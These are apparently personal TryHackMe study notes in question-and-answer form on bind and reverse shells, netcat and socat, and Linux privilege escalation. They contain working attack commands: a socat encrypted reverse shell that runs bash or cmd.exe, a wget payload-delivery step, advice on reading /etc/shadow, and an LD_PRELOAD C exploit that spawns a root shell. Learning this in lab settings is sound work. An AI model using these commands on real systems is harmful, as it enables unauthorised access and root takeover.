THM 1/9/2023 Creating Shells and Priv Esc

Question 1

What are the two kinds of shells you can create?

Answer 1

Bind and Reverse

Question 2

What are the pros and cons of bind shells

Answer 2

Firewalls may prevent this type of connection from happening

straight forward way of creating a shell

Question 3

What the pros and cons of reverse shells

Answer 3

Good way to bypass firewalls

Drawback: configure your own network to accept the shell

*You will very likely default to using this type of connection method

Question 4

What are two common tools to create shells?

Answer 4

netcat and socat

both are/can be linux and windows friendly tools

Question 5

What are the pros and cons of netcat

Explain the flags in this example:
nc -lvnp <port></port>

What are best practices when open a Netcat listener?

Answer 5

Easy to spin up and good for
- banner grabbing
- enumeration
- creating shells

Cons
- very unstable (shells) but can be improved
- Removed in networks due to its security implications
- Insecure when sending commands back and forth

Example:
-l = listen
-v = verbose
-n= No DNS lookup
-p= Port

Best Practices:
- Use common ports (better chance of not getting blocked)

Question 6

What are the pros and cons of socat?

Answer 6

Same as netcat but usually more stable

Drawbacks?
- syntax is more difficult
- not installed by default in linux distos (as compared to netcat)

Question 7

What are 3 techniques to stablize Netcat?

Answer 7

*Python -
Commands to run:
1) python -c ‘import pty;pty.spawn(“/bin/bash)’
2) export TERM=xterm “Give you basic terminal commands”
3) stty raw -echo; fg “background the shell and turns off our own terminal echo”

RLWRAP

SOCAT

*Only works on Linux

Question 8

What are the steps to create an encrypted shell with SOCAT?

Answer 8

Generate a cert
“openssl req –newkey rsa:2048 -nodes -keyout shell.key -x509 -days 362 -out shell.crt”

Merge created files into a single PEM
cat shell.key shell.crt > shell.pem

Set up reverse shell
socat openssl-listen:PORT#,cert=shell.pem,verify=0 -
*verify=0 means to not verify the cert with properly signed authority

socat openssl:IP:PORT,cert=shell.pem,verify=0 EXEC:/bin/bash
OR
socat openssl:IP:PORT,verify=0,cert=shell.pem, EXEC:cmd.exe,pipes

Question 9

Provide a way to upload payload using msvenom

Answer 9

Create a simple http server using python
Wget to grab payload from listener
*remember to move into a directory allowed to execute
modify permissions and execute (gain root priv or better permissions)

Question 10

How do you see which programs you have permission to?

Answer 10

sudo -l

Question 11

Some applications may not have a known exploit (post exploitation for priv esc). What are two ways to leak information?

Answer 11

1) Try to view folders not allowed (ie etc/shadow) with commands you are allowed.

2) Leverage App Functions via “sudo -l”
*look for “env_keep+=LD_PRELOAD”
**LD_PRELOAD is a function that allows any program to use shared libraries

If env_keep exists create and compile C code
“#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h></stdlib.h></stdio.h>

void _init() {
unsetenv(“LD_PRELOAD”);
setgid(0);
setuid(0);
system(“/bin/bash”);
}”

convert to shareable object
“gcc -fPIC -shared -o shell.so shell.c -nostartfiles”